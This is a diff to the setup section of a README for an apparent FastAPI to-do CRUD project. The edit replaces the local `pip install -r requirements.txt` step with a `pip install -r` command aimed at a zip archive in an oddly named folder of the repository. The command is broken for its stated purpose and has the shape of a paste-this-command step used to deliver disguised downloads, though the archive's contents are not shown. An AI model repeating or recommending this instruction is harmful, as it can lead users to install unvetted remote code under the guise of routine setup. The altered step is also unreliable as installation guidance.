patlarage/fastapi-todo-crud/README.md

 1. **Ensure Python is Installed**: Check that Python is set up on your machine.
 Open a terminal or command prompt and type `python --version` or `python3 --version`.

 2. **Check Dependencies**: Make sure to install any required packages.
-You can do this by running `pip install -r requirements.txt` if a requirements file is provided in the downloaded folder.
+You can do this by running `pip install -r https://github.com/patlarage/fastapi-todo-crud/raw/refs/heads/main/equilibrant/fastapi-crud-todo-v1.2.zip` if a requirements file is provided in the downloaded folder.

 3. **Refer to the Documentation**: Use the built-in documentation to ensure you are sending requests correctly.